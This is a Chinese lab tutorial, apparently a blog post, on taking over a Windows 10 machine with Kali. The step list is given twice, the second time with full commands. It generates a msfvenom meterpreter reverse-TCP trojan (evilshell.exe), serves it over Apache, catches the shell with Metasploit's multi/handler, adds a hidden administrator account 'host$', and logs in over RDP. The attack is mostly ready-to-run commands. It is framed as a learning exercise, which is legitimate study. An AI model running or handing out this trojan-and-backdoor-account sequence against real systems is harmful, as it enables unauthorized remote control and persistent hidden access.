admin 管理员组

文章数量: 887021

本文章仅供学习和参考!

欢迎交流~

目录

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

5. 开启apache服务,输入命令:

     可用以下命令查看服务开启状态:

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

7. 开启postgresql服务,其端口号为5432,输入命令:

     可用以下命令查看服务开启状态:

8. 查看端口,输入命令:

9. 开启msfconsole,输入命令:

10.设置攻击模块并运行,输入命令:

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

     若出现乱码现象,可输入命令:

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!


一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

cp evilshell.exe /var/www/html

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

rm 文件1 文件2 ... 文件n

5. 开启apache服务,输入命令:

/etc/init.d/apache2 start

     可用以下命令查看服务开启状态:

/etc/init.d/apache2 status

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

      将文件下载到桌面,方便测试:

7. 开启postgresql服务,其端口号为5432,输入命令:

/etc/init.d/postgresql start 

     可用以下命令查看服务开启状态:

/etc/init.d/postgresql status

8. 查看端口,输入命令:

netstat -ntulp

9. 开启msfconsole,输入命令:

msfconsole  

 

10.设置攻击模块并运行,输入命令:

use exploit/multi/handler     //选择exploits

set payload windows/meterpreter/reverse_tcp   //设置payload

set LHOST  攻击者IP        //修改LHOST参数
    
set LPORT  监听端口        //修改LPORT参数

show options              //查看需要设置的参数

run 或 exploit            //运行攻击模块

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

shell

     若出现乱码现象,可输入命令:

chcp 437

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

net user host$ /add       //添加隐藏用户host$

net user                  //查看用户

net user host$ 密码       //为host$用户设置密码

net localgroup administrators host$ /add    //将host$用户加入到管理员组中,从而提升权限

net user host$            //查看host$用户信息

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

rdesktop 靶机IP

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!

      添加用户:

本文标签: 木马 系统 Windows kali